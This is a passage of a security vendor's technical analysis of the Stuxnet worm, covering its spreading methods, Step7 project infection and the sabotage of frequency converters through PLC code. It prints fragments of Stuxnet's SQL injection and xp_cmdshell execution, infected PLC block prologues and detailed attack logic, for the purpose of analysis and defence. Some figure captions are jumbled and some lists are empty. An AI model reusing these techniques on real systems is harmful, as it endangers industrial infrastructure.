WinCC software. Once it has connected it performs two actions. First, Stuxnet sends malicious SQL code to the
database that allows a version of Stuxnet to be transferred to the computer running the WinCC software and
executes it, thereby infecting the computer that is running the WinCC database. Second, Stuxnet modifies an
existing view adding code that is executed each time the view is accessed.
Page 26
W32.Stuxnet Dossier
Security Response
After sending an SQL configuration query, Stuxnet sends an SQL statement that creates a table and inserts a
binary value into the table. The binary value is a hex string representation of the main Stuxnet DLL as an execut-
able file (formed using resource 210) and an updated configuration data block.
CREATE TABLE sysbinlog ( abin image ) INSERT INTO sysbinlog VALUES(0x…)
If successful, Stuxnet uses OLE Automation Stored Procedures to write itself from the database to disk as
%UserProfile%\sql[RANDOM VALUE].dbi.
The file is then added as a stored procedure and executed.
SET @ainf = @aind + ‘\\sql%05x.dbi’

EXEC sp _ addextendedproc sp _ dumpdbilog, @ainf
EXEC sp _ dumpdbilog
The stored procedure is then deleted and the main DLL file is also deleted.
Once running locally on a computer with WinCC installed, Stuxnet will also save a .cab file derived from resource
203 on the computer as GracS\cc_tlg7.sav. The .cab file contains a bootstrap DLL meant to load the main Stux-
net DLL, located in GracS\cc_alg.sav. Next, Stuxnet will then modify a view to reload itself. Stuxnet modifies the
MCPVREADVARPERCON view to parse the syscomments.text field for additional SQL code to execute. The SQL
code stored in syscomments.text is placed between the markers –CC-SP and --*.
In particular, Stuxnet will store and execute SQL code that will extract and execute Stuxnet from the saved CAB
file using xp_cmdshell.
set @t=left(@t,len(@t)-charindex(‘\\’,reverse(@t)))+’\GraCS\cc _ tlg7.sav’;

set @s = ‘master..xp _ cmdshell ‘’extrac32 /y “’+@t+’” “’+@t+’x”’’’;
exec(@s);
Then, the extracted DLL will be added as a stored procedure, executed, and deleted. This allows Stuxnet to ex-
ecute itself and ensure it remains resident.
Propagation through network shares

Stuxnet also can spread to available network shares through either a scheduled job or using Windows Manage-
ment Instrumentation (WMI).
Stuxnet will enumerate all user accounts of the computer and the domain, and try all available network resourc-
es either using the user’s credential token or using WMI operations with the explorer.exe token in order to copy
itself and execute on the remote share.
Stuxnet will determine if the ADMIN$ share is accessible to build the share name of the main drive (e.g.: C$). An
executable is built using resource 210 and customized with the main DLL code and the latest configuration data
block. After enumerating the directories of the network resource, the executable is copied as a random file name
in the form DEFRAG[RANDLNT].tmp. Next, a network job is scheduled to execute the file two minutes after infec-
tion.
The same process occurs except using WMI with the explorer.exe token instead of using the user’s credential
token.
MS10-061 Print Spooler zero-day vulnerability

This is the zero day Print Spooler vulnerability patched by Microsoft in MS10-061. Although at first it was
thought that this was a privately found/disclosed vulnerability, it was later discovered that this vulnerability
was actually first released in the 2009-4 edition of the security magazine Hakin9 and had been public since that
time, but had not been seen to be used in the wild.
Page 27
W32.Stuxnet Dossier
Security Response
This vulnerability allows a file to be written to the %System% folder of vulnerable machines. The actual code to
carry out the attack is stored in resource 222; this export loads the DLL stored in that resource and prepares the
parameters needed to execute the attack, namely an IP address and a copy of the worm, and then calls export
one from the loaded DLL. Using this information, Stuxnet is able to copy itself to remote computers as %Sys-
tem%\winsta.exe through the Printer Spooler, and then execute itself. Winsta.exe may contain multiple copies of
Stuxnet and grow abnormally large.
Stuxnet will only attempt to use MS10-061 if the current date is before June 1, 2011.
MS08-067 Windows Server Service vulnerability

In addition, Stuxnet also exploits MS08-067, which is the same vulnerability utilized by W32.Downadup. MS08-
067 can be exploited by connecting over SMB and sending a malformed path string that allows arbitrary execu-
tion. Stuxnet uses this vulnerability to copy itself to unpatched remote computers.
Stuxnet will verify the following conditions before exploiting MS08-67:

• The current date must be before January 1, 2030
• Antivirus definitions for a variety of antivirus products dated before January 1, 2009
• Kernel32.dll and Netapi32.dll timestamps after October 12, 2008 (before patch day)
Page 28
W32.Stuxnet Dossier
Security Response
Removable drive propagation

One of the main propagation methods Stuxnet uses is to copy itself to inserted removable drives. Industrial
control systems are commonly programmed by a Windows computer that is non-networked and operators often
exchange data with other computers using removable drives. Stuxnet used two methods to spread to and from
removable drives—one method using a vulnerability that allowed auto-execution when viewing the removable
drive and the other using an autorun.inf file.
LNK Vulnerability (CVE-2010-2568)

Stuxnet will copy itself and its supporting files to available removable drives any time a removable drive is
inserted, and has the ability to do so if specifically instructed. The removable-drive copying is implemented by
exports 1, 19, and 32. Export 19 must be called by other code and then it performs the copying routine immedi-
ately. Exports 1 and 32 both register routines to wait until a removable drive is inserted. The exports that cause
replication to removable drives will also remove infections on the removable drives, depending on a configura-
tion value stored in the configuration data block. Different circumstances will cause Stuxnet to remove the files
from an infected removable drive. For example, once the removable drive has infected three computers, the files
on the removable drive will be deleted.
If called from Export 1 or 32, Stuxnet will first verify it is running within services.exe, and determines which
version of Windows it is running on. Next, it creates a new hidden window with the class name ‘AFX64c313’ that
waits for a removable drive to be inserted (via the WM_DEVICECHANGE message), verifies it contains a logical
volume (has a type of DBT_DEVTYP_VOLUME), and is a removable drive (has a drive type of DEVICE_REMOV-
ABLE). Before infecting the drive, the current time must be before June 24, 2012.
Next, Stuxnet determines the drive letter of the newly inserted drive and reads in the configuration data to de-
termine if it should remove itself from the removable drive or copy itself to the removable drive. When removing
itself, it deletes the following files:
• %DriveLetter%\~WTR4132.tmp
• %DriveLetter%\~WTR4141.tmp
• %DriveLetter%\Copy of Shortcut to.lnk
• %DriveLetter%\Copy of Copy of Shortcut to.lnk
• %DriveLetter%\Copy of Copy of Copy of Shortcut to.lnk
• %DriveLetter%\Copy of Copy of Copy of Copy of Shortcut to.lnk
If the removable drive should be infected, the drive is first checked to see if it is suitable, checking the following
conditions:
• The drive was not just infected, determined by the current time.
• The configuration flag to infect removable drives must be set, otherwise infections occur depending on the
date, but this is not set by default.
• The infection is less than 21 days old.
• The drive has at least 5MB of free space.
• The drive has at least 3 files.
If these conditions are met, the following files are created:
• %DriveLetter%\~WTR4132.tmp (~500Kb)
(This file contains Stuxnet’s main DLL in the stub section and is derived from Resource 210.)
• %DriveLetter%\~WTR4141.tmp (~25Kb)
(This file loads ~WTR4132.tmp and is built from Resource 241.)
• %DriveLetter%\Copy of Shortcut to.lnk
• %DriveLetter%\Copy of Copy of Shortcut to.lnk
• %DriveLetter%\Copy of Copy of Copy of Shortcut to.lnk
• %DriveLetter%\Copy of Copy of Copy of Copy of Shortcut to.lnk
Page 29
W32.Stuxnet Dossier
Security Response
The .lnk files are created using Resource 240 as a template and four are needed as each specifically targets one
or more different versions of Windows including Windows 2000, Windows XP, Windows Server 2003, Windows
Vista, and Windows 7. The .lnk files contain an exploit that will automatically execute ~WTR4141.tmp when sim-
ply viewing the folder.
~WTR4141.tmp then loads ~WTR4132.tmp, but before doing so, it attempts to hide the files on the removable
drive. Hiding the files on the removable drive as early in the infection process as possible is important for the
threat since the rootkit functionality is not installed yet, as described in the Windows Rootkit Functionality sec-
tion. Thus, ~WTR4141.tmp implements its own less-robust technique in the meantime.
~WTR4141.tmp hooks the following APIs from kernel32.dll and Ntdll.dll:
From Kernel32.dll
• FindFirstFileW
• FindNextFileW
• FindFirstFileExW
From Ntdll.dll
• NtQueryDirectoryFile
• ZwQueryDirectoryFile
It replaces the original code for these functions with code that checks for files with the following properties:
• Files with an .lnk extension having a size of 4,171 bytes.
• Files named ~WTRxxxx.TMP, sized between 4Kb and 8 Mb, where xxxx is:
• 4 decimal digits. (~wtr4132.tmp)
• The sum of these digits modulo 10 is null. (Example: 4+1+3+2=10=0 mod 10)
If a request is made to list a file with the above properties, the response from these APIs is altered to state that
the file does not exist, thereby hiding all files with these properties.
After the DLL APIs are hooked, ~WTR4132.tmp is loaded. To load a .dll file normally, a program calls the “Load-
Library” API with the file name of the .dll file to be loaded into memory. W32.Stuxnet uses a different approach,
not just in the first .dll file Figure 14
but in several different USB Execution Flow
parts of the code. This
method is described in
the Bypassing Behavior
Blocking When Loading
DLLs section.
~WTR4132.tmp contains
the main Stuxnet DLL in
the .stub section. This is
extracted into memory
and then Export 15 of
the DLL is called execut-
ing the installation of
Stuxnet. Export 15 is
described in the Installa-
tion section.
The diagram to the right

describes the execution
flow.
Page 30
W32.Stuxnet Dossier
Security Response
AutoRun.Inf
Previous versions of Stuxnet did not use the LNK 0-day exploit, but instead spread via an autorun.inf file. Re-
source 207 is a 500kb file that was only present in the older version of Stuxnet, and was removed in the new
version.
An autorun.inf file is a configuration file placed on removable drives that instructs Windows to automatically ex-
ecute a file on the removable drive when the drive is inserted. Typically, one would place the autorun.inf file and
executable in the root directory of the drive. However, Stuxnet uses a single file. Resource 207 is an executable
file and also contains a correctly formatted autorun.inf data section at the end.
When autorun.inf files are parsed by the Windows OS, the parsing is quite forgiving, meaning that any charac-
ters that are not understood as legitimate autorun commands are skipped. Stuxnet uses this to its advantage by
placing the MZ file first inside the autorun.inf file. During parsing of the autorun.inf file all of the MZ file will be
ignored until the legitimate autorun commands that are appended at the end of the file are encountered. See the
header and footer of the autorun.inf file as shown in the following diagrams.
Figure 15
Autorun.inf header
Figure 16
Autorun.inf footer
When we show only the strings from the footer we can see that they are composed of legitimate autorun com-
mands:
Figure 17
Hidden autorun commands
Notice that Stuxnet uses the autorun commands to specify the file to execute as the actual autorun.inf file. Using
this trick, the autorun.inf file will be treated as a legitimate autorun.inf file first and later as a legitimate execut-
able file.
Page 31
W32.Stuxnet Dossier
Security Response
In addition to this, Stuxnet also uses another trick to enhance the chances Figure 18
that it will be executed. The autorun commands turn off autoplay and then Two “Open” commands
add a new command to the context menu. The command that is added is
found in %Windir%\System32\shell32.dll,-8496. This is actually the “Open”
string. Now when viewing the context menu for the removable device the user
will actually see two “Open” commands.
One of these Open commands is the legitimate one and one is the command
added by Stuxnet. If a user chooses to open the drive via this menu, Stuxnet
will execute first. Stuxnet then opens the drive to hide that anything suspi-
cious has occurred.
Page 32
W32.Stuxnet Dossier
Security Response
Step 7 Project File Infections

The main export, Export 16, calls Export 2, which is used to hook specific APIs that are used to open project files
inside the s7tgtopx.exe process. This process is the WinCC Simatic manager, used to manage a WinCC/Step7
project.
The Import Address Tables of the following DLLs are modified:

• In s7apromx.dll, mfc42.dll, and msvcrt.dll, CreateFileA is replaced to point to “CreateFileA_hook”.
• In ccprojectmgr.exe, StgOpenStorage is replaced to point to “StgOpenStorage_hook”.
CreateFileA is typically used to open *.S7P projects (Step7 project files). Instead, the CreateFileA_hook routine
will be called. If the file opened has the extension .s7p, CreateFileA_hook will call RPC function #9, which is
responsible for recording this path to the encrypted datafile %Windir%\inf\oem6c.pnf, and eventually infect the
project folder inside which the s7p file is located.
StgOpenStorage is used by the Simatic manager to open *.MCP files. These files are found inside Step7 projects.
Like CreateFileA_hook, StgOpenStorage_hook will monitor files with the *.mcp extension. If such a file is ac-
cessed by the manager, the hook function will call RPC function #9 to record the path to oem6c.pnf and eventu-
ally infect the project folder inside which the mcp file is located.
Export 14 is the main routine for infecting Step 7 project files.
The project infector routine takes a path to a project as input, and can infect it causing Stuxnet to execute when
the project is loaded. The project path may be a regular path to a directory, or a path to zip file containing the
project.
Files inside the projects are listed. Those with extensions .tmp, .s7p or .mcp receive special processing.
S7P files
Files with such extensions are Step7 project files. When such a file is found inside a project folder, the project
may be infected.
The project is a candidate for infection if:

• It is not deemed too old (used or accessed in the last 3.5 years).
• It contains a “wincproj” folder with a valid MCP file.
• It is not a Step7 example project, checked by excluding paths matching “*\Step7\Examples\*”.
The infection process then consists of several distinct steps:
1. Stuxnet creates the following files:
• xutils\listen\xr000000.mdx (an encrypted copy of the main Stuxnet DLL)
• xutils\links\s7p00001.dbf (a copy of a Stuxnet data file (90 bytes in length)
• xutils\listen\s7000001.mdx (an encoded, updated version of the Stuxnet configuration data block)
2. The threat scans subfolders under the “hOmSave7” folder. In each of them, Stuxnet drops a copy of a DLL it
carries within its resources (resource 202). This DLL is dropped using a specific file name. The file name is not
disclosed here in the interests of responsible disclosure and will be referred to as xyz.dll.
3. Stuxnet modifies a Step7 data file located in Apilog\types.
When an infected project is opened with the Simatic manager the modified data file will trigger a search for the
previously mentioned xyz.dll file. The following folders are searched in the following order:
• The S7BIN folder of the Step7 installation folder
• The %System% folder
• The %Windir%\system folder
• The %Windir% folder
• Subfolders of the project’s hOmSave7 folder
Page 33
W32.Stuxnet Dossier
Security Response
If the xyz.dll file is not found in one of the first four locations listed above, the malicious DLL will be loaded and
executed by the manager. This .dll file acts as a decryptor and loader for the copy of the main DLL located in
xutils\listen\xr000000.mdx. This strategy is very similar to the DLL Preloading Attacks that emerged in August.
Versions 5.3 and 5.4 SP4 of the manager are impacted. We are unsure whether the latest versions of the man-
ager (v5.4 SP5, v5.5, released in August this year) are affected.
MCP files
Like .s7p files, .mcp files may be found inside a Step7 project folder. However, they are normally created by
WinCC. Finding such a file inside the project may trigger project infection as well as the WinCC database infec-
tion.
The project is a candidate for infection if:

• It is not deemed too old (used or accessed in the last 3.5 years).
• It contains a GracS folder with at least one .pdl file in it.
The infection process then consists of several distinct steps:
1. Stuxnet creates the following files:
• GracS\cc_alg.sav (an encrypted copy of the main Stuxnet DLL)
• GracS\db_log.sav (a copy of a Stuxnet data file, which is 90 bytes in length)
• GracS\cc_alg.sav xutils\listen\s7000001.mdx (an encoded, updated version of the Stuxnet configura
tion data block)
2. A copy of resource 203 is then decrypted and dropped to GracS\cc_tlg7.sav. This file is a Microsoft Cabinet file
containing a DLL used to load and execute Stuxnet.
During this infection process, the WinCC database may be accessed and infections spread to the WinCC data-
base server machine. This routine is described in the Network Spreading section.
TMP files
For every .tmp file found inside the project, the filename is first validated. It must be in the form ~WRxxxxx.tmp,
where ‘xxxxx’ of hexadecimal digits whose sum module 16 is null. For instance, ~WR12346.tmp would qualify
because 1+2+3+4+6 = 16 = 0 mod 16.
The file content is then examined. The first eight bytes must contain the following “magic string”: ‘LRW~LRW~’.
If so, the rest of the data is decrypted. It should be a Windows module, which is then mapped. Export #7 of this
module is executed.
Stuxnet can also harness infected projects to update itself. If a project is opened and it is already infected, Stux-
net verifies if the version inside is newer than the current infection and executes it. This allows Stuxnet to update
itself to newer versions when possible.
Three possible forms of infected project files exist. A different export handles each form.
Export 9 takes a Step7 project path as input, supposedly infected. It will then build paths to the following Stux-
net files located inside the project:
• …\XUTILS\listen\XR000000.MDX
• …\XUTILS\links\S7P00001.DBF
• …\XUTILS\listen\S7000001.MDX
These files are copied to temporary files (%Temp%\~dfXXXX.tmp) and Export 16, the main entry point within
this potentially newer version of Stuxnet, is executed.
Page 34
W32.Stuxnet Dossier
Security Response
Export 31 takes a Step7 project path as input and supposedly infected. It will then build paths to the following
Stuxnet files located inside the project:
• …\GracS\cc_alg.sav
• …\GracS\db_log.sav
• …\GracS\cc_tag.sav
These files are copied to temporary files (%Temp%\~dfXXXX.tmp). Export #16 within these files is then called to
run this version of Stuxnet.
Export 10 is similar to 9 and 31. It can process Step7 folders and extract Stuxnet files located in the Gracs\ or
Xutils\ subfolders. It may also process Zip archives.
Export #16 within the extracted files is then used to run the extracted copy of Stuxnet, and eventually update
the configuration data block.
Page 35
W32.Stuxnet Dossier
Security Response
Modifying PLCs
Resource 208 is dropped by export #17 and is a malicious replacement for Simatic’s s7otbxdx.dll file.
First, it’s worth remembering that the end goal of Stuxnet is to infect specific types of Simatic programmable
logic controller (PLC) devices. PLC devices are loaded with blocks of code and data written using a variety of
languages, such as STL or SCL. The compiled code is an assembly called MC7. These blocks are then run by
the PLC, in order to execute, control, and monitor an industrial process.
The original s7otbxdx.dll is responsible for handling PLC block exchange between the programming device
(i.e., a computer running a Simatic manager on Windows) and the PLC. By replacing this .dll file with its own,
Stuxnet is able to perform the following actions:
• Monitor PLC blocks being written to and read from the PLC.
• Infect a PLC by inserting its own blocks and replacing or infecting existing blocks.
• Mask the fact that a PLC is infected.
Figure 19
PLC and Step7
Simatic PLC 101

Figure 20
Test equipment
To access a PLC, specific
software needs to be in-
stalled. Stuxnet specifically
targets the WinCC/Step 7
software.
With this software installed,

the programmer can con-
nect to the PLC with a data
cable and access the mem-
ory contents, reconfigure it,
download a program onto it,
or debug previously loaded
code. Once the PLC has been
configured and programmed,
the Windows computer can
be disconnected and the PLC
will function by itself. To give
you an idea of what this looks
like, figure 20 is a photo of
some basic test equipment.
Page 36
W32.Stuxnet Dossier
Security Response
Figure 21 shows a portion of Stuxnet’s malicious code in the Step7 STL editor. The beginning of the MC7 code for
one of Stuxnet’s Function Code (FC) blocks is visible. The code shown is from the disassembled block FC1873.
Figure 21
Stuxnet code in the Step7 STL editor
Figure 22
As mentioned previously, the Step 7 soft-
Step7 and PCL communicating via s7otbxdx.dll ware uses a library file called s7otbxdx.dll
to perform the actual communication with
the PLC. The Step7 program calls differ-
ent routines in this .dll file when it wants
to access the PLC. For example, if a block
of code is to be read from the PLC using
Step7, the routine s7blk_read is called.
The code in s7otbxdx.dll accesses the PLC,
reads the code, and passes it back to the
Step7 program, as shown in figure 22.
Looking at how access to the PLC works

when Stuxnet is installed, once Stux-
net executes, it renames the original
s7otbxdx.dll file to s7otbxsx.dll. It then
replaces the original .dll file with its own
version. Stuxnet can now intercept any
call that is made to access the PLC from
any software package.
Page 37
W32.Stuxnet Dossier
Security Response
Stuxnet’s s7otbxdx.dll file contains all Figure 23
potential exports of the original .dll file Communication with malicious version of s7otbxdx.dll
– a maximum of 109 – which allows it to
handle all the same requests. The major-
ity of these exports are simply forwarded
to the real .dll file, now called s7otbxsx.
dll, and nothing untoward happens. In
fact, 93 of the original 109 exports are
dealt with in this manner. The trick, how-
ever, lies in the 16 exports that are not
simply forwarded but are instead inter-
cepted by the custom .dll file. The inter-
cepted exports are the routines to read,
write, and enumerate code blocks on the
PLC, among others. By intercepting these
requests, Stuxnet is able to modify the
data sent to or returned from the PLC
without the operator of the PLC realizing
it. It is also through these routines that
Stuxnet is able to hide the malicious code
that is on the PLC.
The following are the most common

types of blocks used by a PLC:
• Data Blocks (DB) contain program-spe-
cific data, such as numbers, structures,
and so on.
• System Data Blocks (SDB) contain information about how the PLC is configured. They are created depending
on the number and type of hardware modules that are connected to the PLC.
• Organization Blocks (OB) are the entry point of programs. They are executed cyclically by the CPU. In regards
to Stuxnet, two notable OBs are:
• OB1 is the main entry-point of the PLC program. It is executed cyclically, without specific time requirements.
• OB35 is a standard watchdog Organization Block, executed by the system every 100 ms. This function may
contain any logic that needs to monitor critical input in order to respond immediately or perform functions
in a time critical manner.
• Function Blocks (FC) are standard code blocks. They contain the code to be executed by the PLC. Generally, the
OB1 block references at least one FC block.
The infection process

Stuxnet infects PLC with different code depending on the characteristics of the target system. An infection se-
quence consists of code blocks and data blocks that will be injected into the PLC to alter its behavior. The threat
contains three main infection sequences. Two of these sequences are very similar, and functionally equivalent.
These two sequences are dubbed A and B. The third sequence is dubbed sequence C.
Initially, if the DLL is running inside the ccrtsloader.exe file, the malicious s7otbxdx.dll starts two threads respon-
sible for infecting a specific type of PLC:
• The first thread runs an infection routine every 15 minutes. The targeted PLC information has previously been
collected by the hooked exports, mainly s7db_open(). This infection routine specifically targets CPUs 6ES7-
315-2 (series 300) with special SDB characteristics. The sequence of infection is A or B.
• The second thread regularly queries PLC for a specific block that was injected by the first thread if the infec-
tion process succeeded. This block is customized, and it impacts the way sequences A or B run on the infected
PLC.
Finally, the injection of sequence C appears disabled or was only partially completed. Sequence C can be written
only to the 6ES7-417 family, not the 6ES7-315-2 family mentioned above.
Page 38
W32.Stuxnet Dossier
Security Response
The infection thread, sequences A and B

This thread runs the infection routine every 15 minutes. When a PLC is “found”, the following steps are executed:
• First, the PLC type is checked using the s7ag_read_szl API. It must be a PLC of type 6ES7-315-2.
• The SDB blocks are checked to determine whether the PLC should be infected and if so, with which sequence
(A or B).
• If the two steps above passed, the real infection process starts. The DP_RECV block is copied to FC1869, and
then replaced by a malicious block embedded in Stuxnet.
• The malicious blocks of the selected infection sequence are written to the PLC.
• OB1 is infected so that the malicious code sequence is executed at the start of a cycle.
• OB35 is also infected. It acts as a watchdog, and on certain conditions, it can stop the execution of OB1.
The three key steps of the infection process are detailed below.
SDB check
The System Data Blocks are enumerated and parsed. Stuxnet must find an SDB with the DWORD at offset 50h
equal to 0100CB2Ch. This specifies the system uses the Profibus communications processor module CP 342-5.
Profibus is a standard industrial network bus used for distributed I/O, In addition, specific values are searched
for and counted: 7050h and 9500h. The SDB check passes if, and only if, the total number of values found is
equal to or greater than 33. These appear to be Profibus identification numbers, which are required for all Profi-
bus DP devices except Master Class 2 devices. Identification numbers are assigned to manufacturers by Profibus
& Profinet International (PI) for each device type they manufacture. 7050h is assigned to part number KFC750V3
which appears to be a frequency converter drive (also known as variable frequency drive) manufactured by
Fararo Paya in Teheran, Iran. 9500h is assigned to Vacon NX frequency converter drives manufactured by Vacon
based in Finland.
Frequency converter drives are used to control the speed of another device, such as a motor. For example, if the
frequency is increased, the speed of the motor increases. Frequency converter drives are used in multiple indus-
trial control industries including water systems, HVAC, gas pipelines, and other facilities.
Thus, the targeted system is using Profibus to communicate with at least 33 frequency converter drives from one
or both of the two manufacturers, where sequence A is chosen if more Vacon devices are present and sequence
B is chosen if more Fararo Paya devices are present.
DP_RECV replacement
DP_RECV is the name of a standard function block used by network coprocessors. It is used to receive network
frames on the Profibus – a standard industrial network bus used for distributed I/O. The original block is copied
to FC1869, and then replaced by a malicious block. Figure 24
Each time the function is used to receive a packet, OB1 before and after infection
the malicious Stuxnet block takes control: it will call
the original DP_RECV in FC1869 and then do post-
processing on the packet data.
OB1/OB35 infection
Stuxnet uses a simple code-prepending infection
technique to infect Organization Blocks. For example,
the following sequence of actions is performed when
OB1 is infected:
• Increase the size of the original block.
• Write malicious code to the beginning of the block.
• Insert the original OB1 code after the malicious
code.
Figure 24 illustrates OB1 before and after infection.
Page 39
W32.Stuxnet Dossier
Security Response
Sequence blocks
Sequences A and B are extremely close and functionally equivalent. They consist of 17 blocks, the malicious
DP_RECV replacement block, as well as the infected OB1 and OB35 blocks. Figure 25 shows the connections
between the blocks.
Figure 25
Connections Between Blocks, Sequences A and B
Legend:
• Arrows between two code blocks mean that a block calls or executes another block.
• The pink block represents the main block, called from the infected OB1.
• White blocks are standard Stuxnet code blocks.
• Yellow blocks are also Stuxnet blocks, but copied from the Simatic library of standard blocks. They execute common functions, such as timestamp com-
parison.
• Gray blocks are not part of Stuxnet; they’re system function blocks, part of the operating system running on the PLC. They’re used to execute system
tasks, such as reading the system clock (SFC1).
• Green blocks represent Stuxnet data blocks.
Note that block names are misleading (except for the yellow and gray blocks), in the sense that they do not re-
flect the real purpose of the block.
Sequences A and B intercept packets on the Profibus by using the DP_RECV hooking block. Based on the values
found in these blocks, other packets are generated and sent on the wire. This is controlled by a complex state
machine, implemented in the various code blocks that make the sequence. One can recognize an infected PLC in
a clean environment by examining blocks OB1 and OB35. The infected OB1 starts with the following instructions,
meant to start the infection sequence and potentially short-circuit OB1 execution on specific conditions:
UC FC1865
POP
L DW#16#DEADF007
==D
BEC
L DW#16#0
L DW#16#0
Page 40
W32.Stuxnet Dossier
Security Response
The infected OB35 starts with the following instructions, meant to short-circuit OB35 on specific conditions:
UC FC1874
POP
L DW#16#DEADF007
==D
BEC
L DW#16#0
L DW#16#0
The monitor thread

This secondary thread is used to monitor a data block DB890 of sequence A or B. Though constantly running
and probing this block (every 5 minutes), this thread has no purpose if the PLC is not infected. The purpose of
the thread is to monitor each S7-315 on the bus. When the sabotage routine is begun, the thread writes to the
DB890 block of all the other S7-315s on the bus in order to have them begin the sabotage routine as well. This
thread causes the attack to begin almost simultaneously for all S7-315 devices on the same bus.
Behavior of a PLC infected by sequence A/B

Infection sequences A and B are very similar. Unless otherwise stated, what’s mentioned here applies to both
sequences.
• The infection code for a 315-2 is organized as follows:
• The replaced DP_RECV block (later on referred to as the “DP_RECV monitor”) is meant to monitor data sent
by the frequency converter drives to the 315-2 CPU via CP 342-5 Profibus communication modules.
• Up to 6 CP 342-5 Profibus communication modules are supported. Each is a master on its own Profibus
subnet with 31 frequency converter drives as slaves. The addresses of the CP 342-5 modules are recorded.
Note the 315-2 CPU documentation recommends no more than 4 CP 324-5 modules, but in theory can
support more, depending on CPU performance.
• Frames sent over Profibus are inspected. They are expected to have a specific format. Each frame should
have 31 records—one for each slave—of either 28 or 32 bytes as the format differs slightly for the two dif-
ferent frequency converter drives. Some fields are stored.
• The other blocks implement a state machine that controls the process. Transitions from state i to state i+1
are based on events, timers or task completions.
• In state 1 fields recorded by the DP_RECV monitor are examined to determine if the target system is in a
particular state of operation. When enough fields match simple criteria, a transition to state 2 occurs.
• In state 2 a timer is started. Transitioning to state 3 occurs after two hours have elapsed.
• In states 3 and 4, network frames are generated and sent on the Profibus to DP slaves. The contents of these
frames are semi-fixed, and partially depend on what has been recorded by the DP_RECV monitor.
• State 5 initiates a reset of various variables used by the infection sequence (not to be confused with a PLC
reset), before transitioning to state 1. Transitioning to state 0 may also occur in case of errors.
• In state 0, a 5-hour timer is started.
Figure 29 represents a simplified view of this state machine.
The normal path of execution is 1-2-3-4-5-1 – as shown by the solid, blue arrows in the diagram. Let’s detail what
happens during each state.
The initial state is 1 (circled in red). Transitioning to state 2 can take a fair amount of time. The code specifically
monitors for records within the frames sent from the frequency converter drives that contain the current operat-
ing frequency (speed of the device being controlled). This value is held at offset 0xC in each record in the frame
and is referred to as PD1 (parameter data 1). The frequency values can be represented in hertz (Hz) or decihertz
(deciHz). The attackers expect the frequency drives to be running between 807 Hz and 1210 Hz. If PD1 has a
value greater than 1210, the code assumes the values being sent are represented in deciHertz and adjusts all
frequency values by a factor of 10. For example 10000 would be considered 10,000 deciHertz (1000.0 Hz) rather
than 10,000Hz. The routine that counts these records (here after referred to as events) is called once per minute.
Page 41
W32.Stuxnet Dossier
Security Response
Events are counted with a cap of 60 per minute. It seems that this is the optimal, expected rate of events. The
global event counter, initially set to 1,187,136, must reach 2,299,104 to initiate a transition to state 2. If we as-
sume an optimal number of events set to 60 (the max could be 186, but remember the cap), the counting being
triggered every minute, the transition occurs after (2299104-1187136)/60 minutes, which is 12.8 days.
Transitioning from state 2 to 3 is a matter of waiting 2 hours.

Figure 26
State machine path of execution
In states 3 and 4 two network send bursts occur. The traffic generated is semi-fixed, and can be one of the two
sequences. The sequences consist of multiple frames that each contain 31 records. Each frame is sent to each
CP 342-5 module, which passes on the respective record within the frame to each of the 31 frequency converter
drive slaves.
For infection sequence A (for Vacon frequency converters):

• Sequence 1 consists of 147 frames:
• 145 frames for sub-sequence 1a, sent during state 3.
• 2 frames for sub-sequence 1b, sent during state 4.
• Sequence 2 consisting of 163 frames:
For infection sequence B (for Fararo Paya frequency converters):
Page 42
W32.Stuxnet Dossier
Security Response

Transitioning from state 3 to state 4 takes 15 minutes for sequence 1 and 50 minutes for sequence 2.
The data in the frames are instructions for the frequency converter drives. For example one of the frames con-
tains records that change the maximum frequency (the speed at which the motor will operate). The frequency
converter drives consist of parameters, which can be remotely configured via Profibus. One can write new values
to these parameters changing the behavior of the device. The values written to the devices can be found in Ap-
pendix C.
Of note, for sequence A, the maximum frequency is set to 1410 Hz in sequence 1a, then set to 2 Hz in sequence
2a, and then set to 1064 Hz in sequence 2b. Thus, the speed of the motor is changed from 1410Hz to 2Hz to
1064Hz and then over again. Recall the normal operating frequency at this time is supposed to be between 807
Hz and 1210 Hz.
Thus, Stuxnet sabotages the system by slowing down or speeding up the motor to different rates at different
times.
When a network send (done through the DP_SEND primitive) error occurs, up to two more attempts to resend the
frame will be made. Cases where a slave coprocessor is not started are also gracefully handled through the use
of timers.
During states 3 and 4, the execution of the original code in OB1 and OB35 is temporarily halted by Stuxnet. This
is likely used to prevent interference from the normal mode of operation while Stuxnet sends its own frames.
During processing of state 5, various fields are initialized before transitioning to state 1 and starting a new cycle.
The two major events are:
• The global event counter is reset (which was initially 1187136). This means that future transitions from state 1
to state 2 should take about 26.6 days.
• The DP_RECV monitor is reset. This means that the slave reconnaissance process is to take place again before
frame snooping occurs. (Incidentally, note that slave reconnaissance is forced every 5.5 hours.)
Transition to state 0 then occurs if an error was reported. “Error” in this context usually means that OB1 took too
long to execute (over 13 seconds). Otherwise, a regular transition to state 1 takes place.
It is worth mentioning that short-circuits, used to transition directly through states 0 and 1 to state 3, are de-
signed to allow the sabotage routine to begin immediately. This occurs when another S7-315 on the same bus
has fulfilled the wait period. The Windows monitoring thread will modify DB890, setting a flag, causing the PLC
code to immediately begin the sabotage routine and to no longer wait the requisite time. This behavior synchro-
nizes the sabotage routine across all 315s controlled by the same Windows system.
Let’s detail the purpose of the DP_RECV monitor and the subsequent frames sent during state 3 and 4. The code
expects a structure of 31 records of either 28 or 32 bytes (depending on which frequency drive is installed).
Here’s the header of such a record:
Offset Type Name

0 word ID
2 word Index (IND)
4 dword VALUE
8 word ControlWord (CW)/StatusWord (SW)
10 word Reference (REF)/Actual (ACT)
12 word Process Data 1 (PD1)
…
The monitor is especially interested in fields SW, ACT, and PD1. The following pieces of information are recorded:
• Is the tenth bit in SW set? This specifies FieldBus Control is on (one can control the devices via Profibus).
• Is ACT a positive or negative integer? Positive represents a forward direction, while negative reverse direction.
Page 43
W32.Stuxnet Dossier
Security Response
• The value of PD1, which is the output frequency (the current frequency/speed).
The other fields are ignored.
When reaching states 3 and 4, the original PLC code is halted and the malicious PLC code begins sending frames
of data based on the recorded values during the DP_RECV monitor phase. The purpose of sending the frames is
to change the behavior of the frequency converter drives. First of all DP_SEND will send similar types of frames
as the ones that are expected to be received by DP_RECV (which means each frame will contain 31 records of 28
or 32 bytes—one record for each slave frequency converter drive). Each record sent changes a configuration,
such as the maximum frequency on the frequency converter drive. The record fields will be set to zero, except for
the ID, Value, CW, and REF fields.
Table 6
ID Field Format
ID Byte 1 ID Byte 2
15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0
Request Type SM Parameter Number
• ID specifies the parameter to change. The format of the ID field is detailed in Table 6.
